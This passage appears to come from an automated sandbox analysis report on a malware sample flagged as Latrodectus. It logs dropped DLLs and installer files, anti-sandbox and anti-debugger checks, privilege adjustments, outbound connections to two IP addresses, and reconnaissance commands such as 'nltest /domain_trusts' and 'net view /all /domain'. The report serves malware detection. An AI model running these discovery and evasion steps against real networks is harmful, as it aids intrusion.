                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180010451 push rcx; ret 6_2_0000000180010452
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001045A push rcx; ret 6_2_000000018001045B
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018017500F push rdx; iretd 6_2_0000000180175010

                      Persistence and Installation Behavior

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSID8B1.tmpJump to behavior
                      Uses ipconfig to lookup or modify the Windows network settings
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID529.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeFile created: :wtfbbq (copy)Jump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\sharepoint\360total.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID4D9.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8B1.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID69B.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID719.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID509.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID4B9.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3EB.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID498.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8B1.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID69B.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID719.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,6_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,6_2_0000000180062148
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Contains functionality to compare user and computer (likely to detect sandboxes)
                      Source: C:\Windows\System32\rundll32.exeCode function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,6_2_00000001800655A8
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC6_2_0000000180049AEC
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,6_2_000001FB3AB768E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,6_2_000001FB3AB77FA8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,7_2_0000024739A468E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,7_2_0000024739A47FA8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_00000210FEA068E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_00000210FEA07FA8
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8237Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 816Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 946Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: :wtfbbq (copy)Jump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID529.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID719.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID69B.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4D9.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID509.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID4B9.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID498.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3EB.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dllJump to dropped file
                      Source: C:\Windows\Installer\MSID8B1.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-33713
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 1.6 %
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 8.4 %
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC6_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exe TID: 4112Thread sleep count: 8237 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 4112Thread sleep time: -8237000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 5248Thread sleep count: 816 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 5248Thread sleep time: -81600s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 4112Thread sleep count: 946 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 4112Thread sleep time: -946000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B5AF79 FindFirstFileExW,5_2_00B5AF79
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7A350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_000001FB3AB7A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB71A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_000001FB3AB71A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4A350 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0000024739A4A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A41A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_0000024739A41A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0A350 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_00000210FEA0A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA01A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_00000210FEA01A08
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
                      Source: rundll32.exe, 00000007.00000003.3200350559.0000024739B18000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3200350559.0000024739AEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B18000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739AE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000007.00000002.3239728503.000002473BAB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B2D0A5 IsDebuggerPresent,OutputDebugStringW,5_2_00B2D0A5
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_0000000180066C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,6_2_00000001800033E0
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B52DCC mov ecx, dword ptr fs:[00000030h]5_2_00B52DCC
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B5AD78 mov eax, dword ptr fs:[00000030h]5_2_00B5AD78
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B22310 GetProcessHeap,5_2_00B22310
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B433A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B433A8
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4353F SetUnhandledExceptionFilter,5_2_00B4353F
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B42968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B42968
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B46E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B46E1B
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000180070760
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018006F6E0

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.46.75 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.67.219.28 443Jump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B252F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,5_2_00B252F0
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,6_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,6_2_0000000180049278
                      Source: 360total.dll.1.drBinary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
                      Source: rundll32.exeBinary or memory string: Progman
                      Source: rundll32.exeBinary or memory string: Program manager
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B435A9 cpuid 5_2_00B435A9
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: EnumSystemLocalesW,5_2_00B5E0C6
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: EnumSystemLocalesW,5_2_00B5E1AC
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: EnumSystemLocalesW,5_2_00B57132
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: EnumSystemLocalesW,5_2_00B5E111
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00B5E237
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetLocaleInfoEx,5_2_00B423F8
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetLocaleInfoW,5_2_00B5E48A
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00B5E5B3
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetLocaleInfoW,5_2_00B5E6B9
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetLocaleInfoW,5_2_00B576AF
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00B5E788
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00B5DE24
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B437D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00B437D5
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB78AE0 GetUserNameA,wsprintfA,6_2_000001FB3AB78AE0
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B57B1F GetTimeZoneInformation,5_2_00B57B1F
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,6_2_0000000180040CB0
                      Source: C:\Windows\System32\nltest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: rundll32.exeBinary or memory string: 360tray.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fe9f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab70000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab70000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fea00000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fe9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a40000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fea00000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3239304282.0000024739A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3072398215.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3001961858.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2854188056.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1996565614.000001FB3AB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3239248195.0000024739A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fe9f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab70000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab70000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fea00000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fe9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1fb3ab60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a10000.1.unpack, type: UNPACKEDPE
